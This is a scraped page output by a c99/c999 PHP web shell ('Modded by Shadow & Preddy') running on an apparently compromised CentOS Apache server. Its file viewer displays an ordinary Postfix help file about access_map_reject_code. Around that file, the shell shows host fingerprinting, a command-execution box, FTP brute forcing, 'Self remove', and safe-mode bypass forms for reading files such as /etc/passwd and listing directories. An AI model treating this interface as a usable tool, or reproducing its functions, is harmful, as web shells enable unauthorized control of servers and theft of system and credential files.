!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/postfix/help/   drwxr-xr-x
Free 53.68 GB of 127.8 GB (42%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     opt_access_map_reject_code.html (950 B)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
SMTP server response on access map violation
access_map_reject_code

This parameter specifies the SMTP server response code when a mail violates the access map restriction that is:
Access denied: access_map violation (on SMTP client or HELO hostname, sender or recipient email address)

Note that the postfix default value used for access_map_reject_code is code 554, and this code in 'standard RFC 822' should means 'Requested mail action rejected: access denied'. So with Postfix, a access map rule violation does not reflect exactly the RFC822 explanation of reported code.

To avoid confusion, you can change this to 570 for example (another reason is that code 554 is also the postfix default value for other kind of errors), otherwise, do not change this unless you have a complete understanding of RFC 822.



:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0145 ]--